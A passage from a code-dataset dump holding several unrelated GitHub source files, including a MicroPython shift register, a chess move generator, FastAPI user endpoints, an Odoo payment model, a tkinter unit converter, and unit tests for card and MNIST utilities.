again\r\n\r\nclass shiftregister():\r\n def __init__(self) -> None:\r\n self.register = []\r\n self.latch = Pin(latchPin, Pin.OUT)\r\n self.clock = Pin(clockPin, Pin.OUT)\r\n self.data = Pin(dataPin, Pin.OUT)\r\n \r\n def __delete__(self):\r\n self.register = []\r\n self.setregister()\r\n self.latch.low()\r\n self.clock.low()\r\n self.data.low()\r\n\r\n #optional class to set the pins on your microcontroller\r\n def set_pins(self, latch_pin, clock_pin, data_pin):\r\n self.latch.low()\r\n self.clock.low()\r\n self.data.low()\r\n del(self.latch)\r\n del(self.clock)\r\n del(self.data)\r\n self.latch = Pin(latch_pin, Pin.OUT)\r\n self.clock = Pin(clock_pin, Pin.OUT)\r\n self.data = Pin(data_pin, Pin.OUT)\r\n \r\n def set_registerSize(self,size):\r\n for i in range(size):\r\n self.register.append(0)\r\n\r\n def set_register(self):\r\n #open latch for data\r\n self.clock.low()\r\n self.latch.low()\r\n self.clock.high()\r\n\r\n #load data in register\r\n for i in range(len(self.register)-1, -1, -1):\r\n self.clock.low()\r\n if self.register[i] == 1:\r\n self.data.high()\r\n else:\r\n self.data.low()\r\n self.clock.high()\r\n\r\n #close latch for data\r\n self.clock.low()\r\n self.latch.high()\r\n self.clock.high()","repo_name":"gobbyo/IoT","sub_path":"python/raspberrypi/pico/shiftregister.py","file_name":"shiftregister.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3524916038","text":"from copy import deepcopy\nfrom typing import List, Tuple, Dict, Optional, Callable, Set\n\nfrom j_chess_lib.ai.board import BoardState\nfrom j_chess_lib.communication import MoveData\n\n\ndef _add(t1: Tuple[int, int], t2: Tuple[int, int]) -> Tuple[int, int]:\n return t1[0] + t2[0], t1[1] + t2[1]\n\n\ndef _mul(t1: Tuple[int, int], mul: int) -> Tuple[int, int]:\n return t1[0] * mul, t1[1] * mul\n\n\ndef get_possible_moves(\n board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], Tuple[str, int]]]:\n ret: Set[Tuple[Tuple[str, int], Tuple[str, int]]] = set()\n\n fun: Callable[[str], bool] = str.isupper if white else str.islower\n for origin_position, figure in board_state.items():\n if not fun(figure):\n continue\n moves = get_next_position(origin_position=origin_position, board_state=board_state)\n ret.update([(origin_position, x[0]) for x in moves])\n # print(origin_position, figure)\n # print(moves)\n\n return list(ret)\n\n\ndef kill_king_move(board_state: Dict[Tuple[str, int], Optional[str]],\n move: Tuple[Tuple[str, int], Tuple[str, int]]) -> bool:\n f, t = move\n if (f not in board_state) or (t not in board_state):\n return False\n white = board_state[f].isupper()\n enemy: Callable[[str], bool] = str.islower if white else str.isupper\n return enemy(board_state[t]) and board_state[t] in (\"k\", \"K\")\n\n\ndef in_chess(board_state: Dict[Tuple[str, int], Optional[str]], white: bool) -> bool:\n opponent_moves = get_possible_moves(board_state=board_state, white=not white)\n return any(kill_king_move(board_state=board_state, move=x) for x in opponent_moves)\n\n\ndef in_chess_after_move(board_state: Dict[Tuple[str, int], Optional[str]],\n move: Tuple[Tuple[str, int], Tuple[str, int]],\n white: bool) -> bool:\n new_board = deepcopy(board_state)\n new_board[move[1]] = board_state[move[0]]\n del new_board[move[0]]\n return in_chess(board_state=new_board, white=white)\n\n\ndef is_promotion(board_state: Dict[Tuple[str, int], Optional[str]],\n move: Tuple[Tuple[str, int], Tuple[str, int]]) -> bool:\n try:\n f, t = move\n white = board_state[f].isupper()\n from_row = 7 if white else 2\n target_row = 8 if white else 1\n return board_state[f] in (\"p\", \"P\") and t[1] == target_row and f[1] == from_row\n except KeyError as e:\n return False\n\n\ndef get_next_position(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]]\n) -> List[Tuple[Tuple[str, int], bool]]:\n if board_state[origin_position] in _FUNCTIONS:\n return _FUNCTIONS[board_state[origin_position]](origin_position, board_state)\n return []\n\n\ndef _get_next_position_straight(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool,\n directions: List[Tuple[int, int]], max_steps: int = 8\n) -> List[Tuple[Tuple[str, int], bool]]:\n j = 1\n moves = []\n hits = []\n start_pos = (ord(origin_position[0]), origin_position[1])\n enemy: Callable[[str], bool] = str.islower if white else str.isupper\n a, h = ord(\"a\"), ord(\"h\")\n while j <= max_steps and len(directions) > 0:\n for i, direction in reversed(list(enumerate(directions))):\n direction: Tuple[int, int]\n new_pos_tmp = _add(start_pos, _mul(direction, j))\n if not 1 <= new_pos_tmp[1] <= 8 or not a <= new_pos_tmp[0] <= h:\n del directions[i]\n continue\n new_pos: Tuple[str, int] = (chr(new_pos_tmp[0]), new_pos_tmp[1])\n if new_pos in board_state:\n if enemy(board_state[new_pos]):\n hits.append(new_pos)\n del directions[i]\n continue\n moves.append(new_pos)\n j += 1\n return [(x, False) for x in moves] + [(x, True) for x in hits]\n\n\ndef _get_next_position_rook(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n directions = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n return _get_next_position_straight(origin_position=origin_position, board_state=board_state, white=white,\n directions=directions)\n\n\ndef _get_next_position_knight(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n hops = [(2, 1), (-2, 1), (2, -1), (-2, -1), (1, 2), (1, -2), (-1, 2), (-1, -2)]\n enemy: Callable[[str], bool] = str.islower if white else str.isupper\n start_pos = (ord(origin_position[0]), origin_position[1])\n a, h = ord(\"a\"), ord(\"h\")\n moves = [(chr(y[0]), y[1]) for y in (_add(x, start_pos) for x in hops) if a <= y[0] <= h and 1 <= y[1] <= 8]\n return [(x, x in board_state) for x in moves if x not in board_state or enemy(board_state[x])]\n\n\ndef _get_next_position_bishop(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n directions = [(1, 1), (-1, 1), (1, -1), (-1, -1)]\n return _get_next_position_straight(origin_position=origin_position, board_state=board_state, white=white,\n directions=directions)\n\n\ndef _get_next_position_queen(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n directions = [(1, 1), (-1, 1), (1, -1), (-1, -1), (1, 0), (-1, 0), (0, 1), (0, -1)]\n return _get_next_position_straight(origin_position=origin_position, board_state=board_state, white=white,\n directions=directions)\n\n\ndef _get_next_position_king(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n directions = [(1, 1), (-1, 1), (1, -1), (-1, -1), (1, 0), (-1, 0), (0, 1), (0, -1)]\n return _get_next_position_straight(origin_position=origin_position, board_state=board_state, white=white,\n directions=directions, max_steps=1)\n\n\ndef _get_next_position_pawn(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n direction = -1 + 2 * white\n home_row = 2 if white else 7\n moves = [(origin_position[0], origin_position[1] + direction)]\n if not 1 <= moves[0][1] <= 8:\n return []\n if origin_position[1] == home_row and moves[0] not in board_state:\n moves.append((origin_position[0], origin_position[1] + direction * 2))\n col = ord(origin_position[0])\n hits = [(chr(col + x), origin_position[1] + direction) for x in (-1, 1) if ord(\"a\") <= col + x <= ord(\"h\")]\n fun: Callable[[str], bool] = str.islower if white else str.isupper\n return [(x, False) for x in moves if x not in board_state] + \\\n [(x, True) for x in hits if x in board_state and fun(board_state[x])]\n\n\n_FUNCTIONS: Dict[\"str\",\n Callable[[Tuple[str, int], Dict[Tuple[str, int], Optional[str]]],\n List[Tuple[Tuple[str, int], bool]]]] = {\n \"p\": lambda o, b: _get_next_position_pawn(origin_position=o, board_state=b, white=False),\n \"P\": lambda o, b: _get_next_position_pawn(origin_position=o, board_state=b, white=True),\n \"r\": lambda o, b: _get_next_position_rook(origin_position=o, board_state=b, white=False),\n \"R\": lambda o, b: _get_next_position_rook(origin_position=o, board_state=b, white=True),\n \"n\": lambda o, b: _get_next_position_knight(origin_position=o, board_state=b, white=False),\n \"N\": lambda o, b: _get_next_position_knight(origin_position=o, board_state=b, white=True),\n \"b\": lambda o, b: _get_next_position_bishop(origin_position=o, board_state=b, white=False),\n \"B\": lambda o, b: _get_next_position_bishop(origin_position=o, board_state=b, white=True),\n \"q\": lambda o, b: _get_next_position_queen(origin_position=o, board_state=b, white=False),\n \"Q\": lambda o, b: _get_next_position_queen(origin_position=o, board_state=b, white=True),\n \"k\": lambda o, b: _get_next_position_king(origin_position=o, board_state=b, white=False),\n \"K\": lambda o, b: _get_next_position_king(origin_position=o, board_state=b, white=True),\n}\n\n\ndef predict_board(board: BoardState, move: MoveData) -> BoardState:\n board_dict = board.get_board()\n f = move.from_value[0], int(move.from_value[1])\n t = move.to[0], int(move.to[1])\n\n board_dict[t] = board_dict[f]\n del board_dict[f]\n if move.promotion_unit:\n board_dict[t] = move.promotion_unit.upper() if board.white_turn() else move.promotion_unit.lower()\n\n fen = board_to_fen(board=board_dict, fen_tail=board.fen.split(\" \", maxsplit=1)[-1])\n return BoardState(fen=fen)\n\n\ndef board_to_fen(board: Dict[Tuple[str, int], Optional[str]], fen_tail: str) -> str:\n fen_tail = fen_tail.strip()\n ret = []\n\n for r in range(8, 1 - 1, -1):\n cc = 0\n for c in range(0, 8, 1):\n c = chr(c + ord(\"a\"))\n p = (c, r)\n if p in board:\n if cc > 0:\n ret.append(cc)\n cc = 0\n ret.append(board[p])\n else:\n cc += 1\n if cc > 0:\n ret.append(cc)\n ret.append(\"/\")\n\n return f'{\"\".join(str(x) for x in ret)} {fen_tail}'\n","repo_name":"RedRem95/j-chess-lib","sub_path":"j_chess_lib/ai/board/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":9543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74894435734","text":"# from typing import List\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, Depends\n\nfrom app import schemas, services\nfrom app.api import deps\nfrom app.utils import send_new_account_email\n\nrouter = APIRouter()\n\n\n# @router.get(\"/users\")\n# def get_users() -> List[schemas.User]:\n# users = services.user.get_users()\n# return [schemas.User.from_dto(user) for user in users]\n\n\n@router.post(\"/users\", status_code=201)\ndef create_user(user_in: schemas.UserCreate,) -> schemas.User:\n user = schemas.User.from_dto(services.user.create_user(user_in.to_dto()))\n assert user.email is not None\n ident: str = user.email\n send_new_account_email(email_to=ident, username=ident)\n return user\n\n\n@router.get(\"/users/uuid\")\ndef get_current_user_uuid(\n current_user: schemas.User = Depends(deps.get_current_user),\n) -> schemas.User:\n user = services.user.get_user(current_user.uuid)\n return schemas.User.from_dto(user)\n\n\n@router.get(\"/users/{user_uuid}\")\ndef get_user(\n user_uuid: UUID, current_user: schemas.User = Depends(deps.get_current_user)\n) -> schemas.User:\n if user_uuid != current_user.uuid:\n raise PermissionError\n\n user = services.user.get_user(current_user.uuid)\n return schemas.User.from_dto(user)\n\n\n@router.put(\"/users/{user_uuid}\", status_code=204)\ndef update_user(\n user_uuid: UUID,\n user_in: schemas.UserUpdate,\n current_user: schemas.User = Depends(deps.get_current_user),\n) -> None:\n if user_uuid != current_user.uuid:\n raise PermissionError\n\n services.user.update_user(current_user.provider_uuid, user_uuid, user_in.to_dto())\n return None\n\n\n@router.delete(\"/users/{user_uuid}\", status_code=204)\ndef delete_user(\n user_uuid: UUID, current_user: schemas.User = Depends(deps.get_current_user)\n) -> None:\n if user_uuid != current_user.uuid:\n raise PermissionError\n\n services.user.delete_user(current_user.provider_uuid, user_uuid)\n return None\n","repo_name":"Future-Position-X/fpx-monorepo","sub_path":"geo-api/app/app/api/api_v1/endpoints/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"6105580696","text":"'''\n\n请完成一个函数,输入一个二叉树,该函数输出它的镜像。\n\n例如输入:\n\n 4\n / \\\n 2 7\n / \\ / \\\n1 3 6 9\n镜像输出:\n\n 4\n / \\\n 7 2\n / \\ / \\\n9 6 3 1\n\n'''\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def mirrorTree(self, root: TreeNode) -> TreeNode:\n def helper(node:TreeNode):\n if not node:\n return\n node.left,node.right = node.right,node.left\n helper(node.left)\n helper(node.right)\n helper(root)\n return root","repo_name":"xiaoqi25478/Job","sub_path":"算法与数据结构/LeetCode/二叉树(BinaryTree)/剑指 Offer 27. 二叉树的镜像.py","file_name":"剑指 Offer 27. 二叉树的镜像.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"13719967329","text":"import pandas as pd\n\ndef create_medications(names, counts):\n return pd.Series(data=names, index=counts)\n \ndef get_percent(medications, name):\n #print(sum(map(int, medications.index)))\n print(medications.iloc[0])\n #print(medications.loc['chlorhexidine'])\n return 0\n #return medications.iloc[0]/sum(map(int, medications.index)) * 100\n\n\nnames=['chlorhexidine', 'cyntomycin', 'afobazol']\ncounts=[15, 18, 7]\nmedications = create_medications(names, counts)\nprint(get_percent(medications, \"chlorhexidine\")) #37.5\n","repo_name":"zchipirov/edu","sub_path":"PY_10_Введение в Pandas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18765172688","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp import models, fields, api\nfrom openerp.exceptions import ValidationError\n\n\nclass AbstractAccountPaymentImputationLine(models.AbstractModel):\n _name = 'abstract.payment.imputation.line'\n\n def _compute_amounts(self):\n for line in self:\n line.update({\n 'amount_residual': abs(line.move_line_id.amount_residual_currency)\n if line.move_line_id.amount_currency else abs(line.move_line_id.amount_residual),\n 'amount_total': abs(line.move_line_id.amount_currency)\n if line.move_line_id.amount_currency else abs(line.move_line_id.debit - line.move_line_id.credit),\n 'amount_residual_company': abs(line.move_line_id.amount_residual),\n 'amount_total_company': abs(line.move_line_id.debit - line.move_line_id.credit)\n })\n\n def _compute_currency_id(self):\n for line in self:\n line.currency_id = line.move_line_id.currency_id or line.move_line_id.company_currency_id\n\n def _compute_name(self):\n for line in self:\n invoice = line.move_line_id.invoice_id\n line.name = invoice.name_get()[0][1] if invoice else line.move_line_id.name\n\n name = fields.Char('Documento', compute='_compute_name')\n move_line_id = fields.Many2one('account.move.line', 'Documento')\n invoice_id = fields.Many2one('account.invoice', 'Factura')\n currency_id = fields.Many2one('res.currency', compute='_compute_currency_id')\n company_currency_id = fields.Many2one(related='move_line_id.company_currency_id')\n amount_residual = fields.Monetary('Restante moneda comprobante', compute='_compute_amounts')\n amount_total = fields.Monetary('Total moneda comprobante', compute='_compute_amounts')\n amount_residual_company = fields.Monetary('Restante moneda empresa', compute='_compute_amounts')\n amount_total_company = fields.Monetary('Total moneda empresa', compute='_compute_amounts')\n company_id = fields.Many2one(\n 'res.company',\n string='Compania',\n related='move_line_id.company_id',\n store=True,\n readonly=True,\n related_sudo=False\n )\n concile = fields.Boolean('Conciliacion completa')\n\n\nclass PaymentImputationLine(models.Model):\n _name = 'payment.imputation.line'\n _inherit = 'abstract.payment.imputation.line'\n\n @api.depends('payment_id.payment_date', 'company_currency_id', 'payment_currency_id')\n def _get_payment_amounts(self):\n for line in self:\n company_currency = line.company_currency_id\n payment_currency = line.payment_currency_id\n if payment_currency:\n date = line.payment_id.payment_date or fields.Date.today()\n residual = company_currency.with_context(date=date).compute(\n line.amount_residual_company, payment_currency\n )\n total = company_currency.with_context(date=date).compute(\n line.amount_total_company, payment_currency\n )\n else:\n residual = line.amount_residual_company\n total = line.amount_total_company\n\n line.update({\n 'amount_residual_in_payment_currency': residual,\n 'amount_total_in_payment_currency': total,\n })\n\n payment_id = fields.Many2one('account.payment', 'Pago', ondelete='cascade')\n amount = fields.Monetary('Total A imputar', currency_field='payment_currency_id')\n payment_currency_id = fields.Many2one(related='payment_id.currency_id', readonly=True)\n payment_state = fields.Selection(related='payment_id.state')\n amount_residual_in_payment_currency = fields.Monetary(\n compute='_get_payment_amounts',\n currency_field='payment_currency_id'\n )\n amount_total_in_payment_currency = fields.Monetary(\n compute='_get_payment_amounts',\n currency_field='payment_currency_id'\n )\n\n @api.onchange('concile')\n def onchange_concile(self):\n self.amount = self.amount_residual_in_payment_currency if self.concile else self.amount\n\n @api.onchange('amount')\n def onchange_amount(self):\n self.concile = self.amount == self.amount_residual_in_payment_currency\n\n def validate(self, invoice_move_line):\n \"\"\"\n Valida que no haya problemas a la necesitar generar una imputacion a una invoice\n :param invoice_move_line: account.move.line de la invoice\n \"\"\"\n self.ensure_one()\n # Caso que se modifique el asiento y deje inconsistencia\n if len(invoice_move_line) != 1:\n raise ValidationError(\"El asiento de la factura que se quiere imputar no tiene cuentas deudoras \"\n \"o tiene mas de una asociada, por favor, modificar el asiento primero\")\n if self.amount_residual_in_payment_currency < self.amount or self.amount < 0:\n raise ValidationError(\"No se pueden imputar importes negativos o mayores que lo que reste pagar\")\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"test-odoorosario/opt","sub_path":"odoo_addons_l10n_ar/l10n_ar_payment_imputation/models/payment_imputation_line.py","file_name":"payment_imputation_line.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16110756012","text":"# 코드 출처: https://uipath.tistory.com/135\n# api 참고 https://developers.google.com/drive/api/v3/reference?hl=ko\nfrom Google import Gdrive\n \n \nCLIENT_SECRET_FILE = '/Users/dongyokim/main/jupyter/2022:Summer/크롤링 스터디/5/credentials.json'\nAPI_NAME = 'drive'\nAPI_VERSION = 'v3'\nSCOPES = ['https://www.googleapis.com/auth/drive']\n\nservice = Gdrive(CLIENT_SECRET_FILE, API_NAME, API_VERSION, SCOPES)\n\nprint(dir(service)) \n\n\n\n\n# 폴더 생성 테스트 \nfolders = ['folder1', 'folder2', 'folder3']\n\nfor folder in folders:\n file_metadata = {\n 'name' : folder, \n 'mimeType' : 'application/vnd.google-apps.folder'\n }\n\n service.files().create(body=file_metadata).execute()\n\n\n\n\n","repo_name":"ehddy/crawling_study","sub_path":"5/Create_Service.py","file_name":"Create_Service.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35137244374","text":"\nfrom tkinter import *\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\n\n#colors\n\ncolor1 = '#3b3b3b' # black\ncolor2 = '#ffffff' # white\ncolor3 = '#48b3e0' # blue\n\njanela = Tk()\njanela.title('')\njanela.geometry('650x260')\njanela.configure(bg=color1)\n\n# Window Frames\n\nframe_up = Frame(janela, width=450, height=50, bg=color2, pady=0, padx=3, relief='flat')\nframe_up.place(x=2, y=2)\n\nframe_left = Frame(janela, width=450, height=220, bg=color2, pady=0, padx=3, relief='flat')\nframe_left.place(x=2, y=55)\n\nframe_right = Frame(janela, width=198, height=260, bg=color2, pady=0, padx=3, relief='flat')\nframe_right.place(x=455, y=2)\n\n# Window Style\n\nstyle = ttk.Style(janela)\nstyle.theme_use(\"clam\")\n\n# Up Frame Config\n\nl_app_name = Label(frame_up, text='Unit Calculator', height=1, padx=0, relief='flat', anchor='center', font=('Ivy 15 bold'), bg=color2, fg=color3)\nl_app_name.place(x=80, y=10)\n\n# Button Weight\n\nw=130 #buttun width\n\nimg_0 = Image.open('icons/weight.png')\nimg_0 = img_0.resize((50,50), Image.ANTIALIAS)\nimg_0 = ImageTk.PhotoImage(img_0)\nbutton0 = Button(frame_left, text='Weight', image=img_0, compound=LEFT, width=125, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton0.grid(row=0, column=0, sticky=NSEW, padx=5, pady=5)\n\n# Button Time\nimg_1 = Image.open('icons/time.png')\nimg_1 = img_1.resize((50,50), Image.ANTIALIAS)\nimg_1 = ImageTk.PhotoImage(img_1)\nbutton1 = Button(frame_left, text='Time', image=img_1, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton1.grid(row=0, column=1, sticky=NSEW, padx=5, pady=5)\n\n# Button Length\nimg_2 = Image.open('icons/length.png')\nimg_2 = img_2.resize((50,50), Image.ANTIALIAS)\nimg_2 = ImageTk.PhotoImage(img_2)\nbutton2 = Button(frame_left, text='Length', image=img_2, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton2.grid(row=0, column=2, sticky=NSEW, padx=5, pady=5)\n\n# Button Area\nimg_3 = Image.open('icons/area.png')\nimg_3 = img_3.resize((50,50), Image.ANTIALIAS)\nimg_3 = ImageTk.PhotoImage(img_3)\nbutton3 = Button(frame_left, text=' Area', image=img_3, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton3.grid(row=1, column=0, sticky=NSEW, padx=5, pady=5)\n\n# Button Volume\nimg_4 = Image.open('icons/volume.png')\nimg_4 = img_4.resize((50,50), Image.ANTIALIAS)\nimg_4 = ImageTk.PhotoImage(img_4)\nbutton4 = Button(frame_left, text='Volume', image=img_4, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton4.grid(row=1, column=1, sticky=NSEW, padx=5, pady=5)\n\n# Button Speed\nimg_5 = Image.open('icons/speed.png')\nimg_5 = img_5.resize((50,50), Image.ANTIALIAS)\nimg_5 = ImageTk.PhotoImage(img_5)\nbutton5 = Button(frame_left, text='Speed', image=img_5, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton5.grid(row=1, column=2, sticky=NSEW, padx=5, pady=5)\n\n# Button Temperature\nimg_6 = Image.open('icons/temperature.png')\nimg_6 = img_6.resize((50,50), Image.ANTIALIAS)\nimg_6 = ImageTk.PhotoImage(img_6)\nbutton6 = Button(frame_left, text='Temperature', image=img_6, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 9 bold'), bg=color3, fg=color2)\nbutton6.grid(row=2, column=0, sticky=NSEW, padx=5, pady=5)\n\n# Button Energy\nimg_7 = Image.open('icons/energy.png')\nimg_7 = img_7.resize((50,50), Image.ANTIALIAS)\nimg_7 = ImageTk.PhotoImage(img_7)\nbutton7 = Button(frame_left, text='Energy', image=img_7, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton7.grid(row=2, column=1, sticky=NSEW, padx=5, pady=5)\n\n# Button Pressure\nimg_8 = Image.open('icons/pressure.png')\nimg_8 = img_8.resize((50,50), Image.ANTIALIAS)\nimg_8 = ImageTk.PhotoImage(img_8)\nbutton8 = Button(frame_left, text='Pressure', image=img_0, compound=LEFT, width=w, height=50, overrelief='solid', relief='flat', anchor='center', font=('Ivy 10 bold'), bg=color3, fg=color2)\nbutton8.grid(row=2, column=2, sticky=NSEW, padx=5, pady=5)\n\njanela.mainloop()\n\n#Right Frame","repo_name":"felipesimao1/units-calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25295957304","text":"from Cards import *\nimport unittest\nimport random\nglobal rank,suit\nrank = ['A','2','3','4','5','6','7','8','9','10','J','Q','K']\nsuit = ['S','C','H','D']\n\nclass TestCards(unittest.TestCase):\n\n def setUp(self):\n r = random.choice(rank)\n s = random.choice(suit)\n self.new_card = Card(r,s)\n self.new_deck = Deck()\n self.new_deck1 = Deck()\n\n def test_get_rank(self):\n '''test whether the function get the rank of card'''\n self.assertEqual(self.new_card.get_rank(), self.new_card.r)\n self.assertFalse(self.new_card.get_rank() != self.new_card.r)\n\n def test_get_suit(self):\n '''test whether the function get the suit of card'''\n self.assertEqual(self.new_card.get_suit(), self.new_card.s)\n self.assertFalse(self.new_card.test_get_suit != self.new_card.s)\n\n def test_get_value(self):\n '''test whether the function get the value of card'''\n for self.new_card.r in rank:\n if self.new_card.r == 'A':\n self.assertEqual(self.new_card.get_value(), 1)\n elif self.new_card.r in ['J','Q','K']:\n self.assertEqual(self.new_card.get_value(), 10)\n else:\n self.assertEqual(self.new_card.get_value(), int(self.new_card.r))\n\n def test_card__str__(self):\n '''test whether the function print the card'''\n self.assertEqual(str(self.new_card), str(self.new_card.r+self.new_card.s))\n\n def test_shuffle(self):\n '''test whether the function shuffle the deck'''\n self.assertEqual(str(self.new_deck),str(self.new_deck1))\n self.new_deck.shuffle()\n self.assertFalse(str(self.new_deck) == str(self.new_deck1))\n\n def test_get_deck(self):\n '''test whether the function get the deck'''\n k = 0\n for i in range(0,4):\n for j in range(0,13):\n self.assertEqual(str(self.new_deck1.get_deck()[k]), str(rank[j])+str(suit[i]))\n k +=1\n\n def test_deal(self):\n '''test whether the function deal one card'''\n self.assertEqual(str(self.new_deck.deal()),'KD')\n\n def test_deck__str__(self):\n '''test whether the function print the deck'''\n deck = ''\n for i in range(0,4):\n for j in range(0,13):\n deck = deck+str(rank[j])+str(suit[i])+'\\n'\n self.assertEqual(str(self.new_deck), deck)\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(TestSequenceFunctions)\nunittest.TextTestRunner(verbosity=2).run(suite)","repo_name":"terrymyy-zz/pair-programing","sub_path":"CardsTest.py","file_name":"CardsTest.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11522858720","text":"\nimport pytest\nimport numpy as np\n\nfrom util import get_image_data_ubyte\nfrom util import get_image_data_train\nfrom util import get_image_data_test\n\nfrom util import get_label_data_ubyte\nfrom util import get_label_data_train\nfrom util import get_label_data_test\n\nfrom util import hot_one_arrays\n\nfrom constants import test_images_filename\nfrom constants import test_labels_filename\nfrom constants import num_train_samples\nfrom constants import num_test_samples\nfrom constants import image_size\n\n# images\n\ndef test_get_image_data_ubyte():\n filename = test_images_filename\n result = get_image_data_ubyte(\n filename=filename, \n num_images=num_test_samples,\n image_size=image_size\n )\n assert len(result) == num_test_samples\n assert len(result[0]) == image_size\n\ndef test_get_image_data_train():\n result = get_image_data_train()\n assert len(result) == num_train_samples\n assert len(result[0]) == image_size\n\ndef test_get_image_data_test():\n result = get_image_data_test()\n assert len(result) == num_test_samples\n assert len(result[0]) == image_size\n\n# labels\n\ndef test_get_label_data_ubyte():\n filename = test_labels_filename\n result = get_label_data_ubyte(\n filename=filename, \n num_labels=num_test_samples\n )\n assert len(result) == num_test_samples\n assert result[0] >= 0 and result[0] <= 9\n\ndef test_get_label_data_train():\n result = get_label_data_train()\n assert len(result) == num_train_samples\n assert result[0] >= 0 and result[0] <= 9\n\ndef test_get_label_data_test():\n result = get_label_data_test()\n assert len(result) == num_test_samples\n assert result[0] >= 0 and result[0] <= 9\n\n# other\n\ndef test_hot_one():\n result = hot_one_arrays(np.array([ 3, 0, 5, 1 ]))\n expected_result = np.array([\n [0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 1],\n [0, 1, 0, 0, 0, 0]\n ])\n np.testing.assert_equal(result, expected_result)\n\n\n","repo_name":"ryanbennettvoid/ml-practice2020","sub_path":"multiclass_classification_chars/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27870300903","text":"import json\nimport numpy as np\nfrom numba import jit\n\nfrom trajectories.utils import *\n\n\"\"\"All this is based on this paper: https://www.researchgate.net/publication/4246136_A_Novel_Data_Association_Algorithm_for_Object_Tracking_in_Clutter_with_Application_to_Tennis_Video_Analysis\"\"\"\n\n\n@jit\ndef find_seed_triplets(candidates: np.ndarray, n_candidates: np.ndarray, k: int, radius=100):\n \"\"\"Find seed triplets for the given candidate list\n\n Parameters\n ----------\n candidates : np.ndarray, shape (:, max_candidates, 2)\n positions of the detection candidates.\n The first dimension refers to the frames,\n the second dimension to the candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. Necessary for jit complation\n k : int\n frame of which to find the seed triplet\n radius : int, optional\n maximum distance between candidates of different frames\n to use them for a seed triplet, by default 100\n\n Returns\n -------\n seed_triplets: np.ndarray of shape (num_seed_triplets, 3).\n The second component contains the indices of the candidates in:\n - k-1\n - k\n - 